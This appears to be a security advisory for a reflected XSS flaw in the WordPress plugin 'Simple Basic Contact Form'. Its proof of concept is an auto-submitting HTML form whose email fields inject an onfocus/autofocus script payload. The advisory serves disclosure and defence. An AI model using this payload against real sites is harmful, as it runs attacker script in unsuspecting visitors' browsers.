Simple Basic Contact Form <= 20250114 – Reflected XSS | CVE 2026-8172

Description

The plugin does not escape user-supplied input before reflecting it into the contact form output on validation errors, leading to a Reflected Cross-Site Scripting vulnerability that unauthenticated attackers can exploit against site visitors via a crafted link or cross-site form submission.

Proof of Concept

**Prerequisites:** the site has a published page containing the `[simple_contact_form]` shortcode (e.g. `https://example.com/contact-form/`).

**Steps:**

1. Save the following HTML on an attacker-controlled origin and lure a victim to visit it. The victim's browser auto-POSTs the malicious payload to the WordPress contact-form page; the plugin re-renders the form on validation error and reflects the value unescaped, firing JavaScript via `autofocus` + `onfocus`.

```html
<!DOCTYPE html>
<html><body>
<form id="x" action="https://example.com/contact-form/" method="POST">
  <input name="scf-key" value="process">
  <input name="scf_name" value="Audit">
  <input name="scf_email" value='test" onfocus="alert(/XSS/)" autofocus="true'>
  <input name="scf_confirm_email" value='test" onfocus="alert(/XSS/)" autofocus="true'>
  <input name="scf_message" value="audit">
  <input name="scf-nonce" value="invalid">
</form>
<script>document.getElementById('x').submit();</script>
</body></html>
```